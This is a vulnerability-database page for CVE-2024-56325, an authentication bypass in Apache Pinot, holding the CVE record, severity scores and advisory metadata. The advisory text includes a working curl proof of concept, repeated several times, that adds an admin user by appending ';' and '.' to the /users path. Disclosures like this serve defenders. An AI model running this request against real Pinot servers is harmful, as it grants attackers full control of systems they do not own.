GCVE Workshop - 22 September 2026 (14:00-18:00), Luxembourg Before The Vulnopticon Conference - Registration

CVE-2024-56325 (GCVE-0-2024-56325)

Vulnerability from cvelistv5 – Published: 2025-04-01 09:07 – Updated: 2025-10-27 17:11
VLAI
Title
Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required
Summary
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
SSVC
Exploitation: none Automatable: yes Technical Impact: total
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2025-04-18 14:23 UTC
CWE
  • CWE-288 - Authentication Bypass Using an Alternate Path or Channel
Impacted products
Vendor Product Version CPE status
Apache Software Foundation Apache Pinot Affected: 0 , < 1.3 (maven)
guessed Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-04-01T10:03:56.094Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2025/03/27/8"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-56325",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-18T14:23:26.095702Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-18T14:24:14.801Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "org.apache.pinot.controller.api",
          "product": "Apache Pinot",
          "vendor": "Apache Software Foundation",
          "versions": [
            {
              "lessThan": "1.3",
              "status": "affected",
              "version": "0",
              "versionType": "maven"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "75Acol at Huawei"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "fcgboy at Huawei"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "wk2025 at Huawei"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "leo at Huawei"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cb\u003eAuthentication Bypass Issue\u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eIf the path does not contain / and contain., authentication is not required.\u003cbr\u003e\u003cbr\u003e\u003cb\u003eExpected Normal Request and Response Example\u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003ecurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} \u003ca target=\"_blank\" rel=\"nofollow\" href=\"http://{server_ip}:9000/users\"\u003ehttp://{server_ip}:9000/users\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cb\u003eMalicious Request and Response Example\u003c/b\u003e \u003cbr\u003e\u003cbr\u003ecurl -X POST -H \"Content-Type: application/json\" -d \u0027{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}\u0027\u003cb\u003e \u003c/b\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"http://{serverip}:9000/users;\"\u003e\u003cb\u003ehttp://{serverip}:9000/users;\u003c/b\u003e\u003c/a\u003e\u003cb\u003e.\u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\nReturn: {\"users\":{}}\n\u003cbr\u003e\u003cbr\u003e\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e"
            }
          ],
          "value": "Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d \u0027{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}\u0027  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot."
        }
      ],
      "metrics": [
        {
          "other": {
            "content": {
              "text": "critical"
            },
            "type": "Textual description of severity"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-288",
              "description": "CWE-288 Authentication Bypass Using an Alternate Path or Channel",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-27T17:11:08.160Z",
        "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "shortName": "apache"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
    "assignerShortName": "apache",
    "cveId": "CVE-2024-56325",
    "datePublished": "2025-04-01T09:07:14.185Z",
    "dateReserved": "2024-12-19T14:28:37.532Z",
    "dateUpdated": "2025-10-27T17:11:08.160Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2024-56325",
      "date": "2026-09-17",
      "epss": "0.80212",
      "percentile": "0.99597"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-56325\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2025-04-01T09:15:15.240\",\"lastModified\":\"2026-06-17T08:12:02.857\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Authentication Bypass Issue\\n\\nIf the path does not contain / and contain., authentication is not required.\\n\\nExpected Normal Request and Response Example\\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d {\\\\\\\"username\\\\\\\":\\\\\\\"hack2\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}  http://{server_ip}:9000/users \\n\\n\\nReturn: {\\\"code\\\":401,\\\"error\\\":\\\"HTTP 401 Unauthorized\\\"}\\n\\n\\nMalicious Request and Response Example \\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d \u0027{\\\\\\\"username\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}\u0027  http://{serverip}:9000/users; http://{serverip}:9000/users; .\\n\\n\\nReturn: {\\\"users\\\":{}}\\n\\n\\n\\n \\n\\nA new user gets added bypassing authentication, enabling the user to control Pinot.\"},{\"lang\":\"es\",\"value\":\"Problema de omisi\u00f3n de autenticaci\u00f3n: Si la ruta no contiene / ni contiene., no se requiere autenticaci\u00f3n. Ejemplo de solicitud y respuesta normal esperada:  curl -X POST -H \\\"Content-Type: application/json\\\" -d {\\\\\\\"username\\\\\\\":\\\\\\\"hack2\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"} http://{server_ip}:9000/users. Devuelve: {\\\"code\\\":401,\\\"error\\\":\\\"HTTP 401 Unauthorized\\\"}. Ejemplo de solicitud y respuesta maliciosa: curl -X POST -H \\\"Content-Type: application/json\\\" -d \u0027{\\\\\\\"username\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}\u0027 http://{serverip}:9000/users; http://{serverip}:9000/users; . Devuelve: {\\\"users\\\":{}} Se agrega un nuevo usuario sin autenticaci\u00f3n, lo que le permite controlar Pinot.\"}],\"affected\":[{\"source\":\"security@apache.org\",\"affectedData\":[{\"vendor\":\"Apache Software Foundation\",\"product\":\"Apache Pinot\",\"defaultStatus\":\"unaffected\",\"packageName\":\"org.apache.pinot.controller.api\",\"versions\":[{\"version\":\"0\",\"lessThan\":\"1.3\",\"versionType\":\"maven\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2025-04-18T14:23:26.095702Z\",\"id\":\"CVE-2024-56325\",\"options\":[{\"exploitation\":\"none\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"total\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-288\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.3.0\",\"matchCriteriaId\":\"0EFF8D9E-5303-4530-A902-BB4C7FE88A21\"}]}]}],\"references\":[{\"url\":\"https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v\",\"source\":\"security@apache.org\",\"tags\":[\"Mailing List\",\"Vendor Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2025/03/27/8\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]}]}}",
    "redhat_vex": {
      "current_release_date": "2025-05-28T22:26:16+00:00",
      "cve": "CVE-2024-56325",
      "id": "CVE-2024-56325",
      "initial_release_date": "2024-01-01T00:00:00+00:00",
      "product_status:known_not_affected": "1",
      "source": "Red Hat CSAF VEX",
      "status": "final",
      "title": "Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2024/cve-2024-56325.json",
      "version": "3"
    },
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"http://www.openwall.com/lists/oss-security/2025/03/27/8\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2025-04-01T10:03:56.094Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-56325\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-04-18T14:23:26.095702Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-04-18T14:23:13.948Z\"}}], \"cna\": {\"title\": \"Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"75Acol at Huawei\"}, {\"lang\": \"en\", \"type\": \"finder\", \"value\": \"fcgboy at Huawei\"}, {\"lang\": \"en\", \"type\": \"finder\", \"value\": \"wk2025 at Huawei\"}, {\"lang\": \"en\", \"type\": \"finder\", \"value\": \"leo at Huawei\"}], \"metrics\": [{\"other\": {\"type\": \"Textual description of severity\", \"content\": {\"text\": \"critical\"}}}], \"affected\": [{\"vendor\": \"Apache Software Foundation\", \"product\": \"Apache Pinot\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"1.3\", \"versionType\": \"maven\"}], \"packageName\": \"org.apache.pinot.controller.api\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v\", \"tags\": [\"vendor-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Authentication Bypass Issue\\n\\nIf the path does not contain / and contain., authentication is not required.\\n\\nExpected Normal Request and Response Example\\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d {\\\\\\\"username\\\\\\\":\\\\\\\"hack2\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}  http://{server_ip}:9000/users \\n\\n\\nReturn: {\\\"code\\\":401,\\\"error\\\":\\\"HTTP 401 Unauthorized\\\"}\\n\\n\\nMalicious Request and Response Example \\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d \u0027{\\\\\\\"username\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}\u0027  http://{serverip}:9000/users; http://{serverip}:9000/users; .\\n\\n\\nReturn: {\\\"users\\\":{}}\\n\\n\\n\\n \\n\\nA new user gets added bypassing authentication, enabling the user to control Pinot.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cb\u003eAuthentication Bypass Issue\u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eIf the path does not contain / and contain., authentication is not required.\u003cbr\u003e\u003cbr\u003e\u003cb\u003eExpected Normal Request and Response Example\u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003ecurl -X POST -H \\\"Content-Type: application/json\\\" -d {\\\\\\\"username\\\\\\\":\\\\\\\"hack2\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"} \u003ca target=\\\"_blank\\\" rel=\\\"nofollow\\\" href=\\\"http://{server_ip}:9000/users\\\"\u003ehttp://{server_ip}:9000/users\u003c/a\u003e\u003cbr\u003e\u003cbr\u003e\\nReturn: {\\\"code\\\":401,\\\"error\\\":\\\"HTTP 401 Unauthorized\\\"}\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cb\u003eMalicious Request and Response Example\u003c/b\u003e \u003cbr\u003e\u003cbr\u003ecurl -X POST -H \\\"Content-Type: application/json\\\" -d \u0027{\\\\\\\"username\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}\u0027\u003cb\u003e \u003c/b\u003e\u003ca target=\\\"_blank\\\" rel=\\\"nofollow\\\" href=\\\"http://{serverip}:9000/users;\\\"\u003e\u003cb\u003ehttp://{serverip}:9000/users;\u003c/b\u003e\u003c/a\u003e\u003cb\u003e.\u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\\nReturn: {\\\"users\\\":{}}\\n\u003cbr\u003e\u003cbr\u003e\\n \\n\\nA new user gets added bypassing authentication, enabling the user to control Pinot.\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-288\", \"description\": \"CWE-288 Authentication Bypass Using an Alternate Path or Channel\"}]}], \"providerMetadata\": {\"orgId\": \"f0158376-9dc2-43b6-827c-5f631a4d8d09\", \"shortName\": \"apache\", \"dateUpdated\": \"2025-10-27T17:11:08.160Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-56325\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-27T17:11:08.160Z\", \"dateReserved\": \"2024-12-19T14:28:37.532Z\", \"assignerOrgId\": \"f0158376-9dc2-43b6-827c-5f631a4d8d09\", \"datePublished\": \"2025-04-01T09:07:14.185Z\", \"assignerShortName\": \"apache\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…

Related by attack behaviour

Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.


Loading…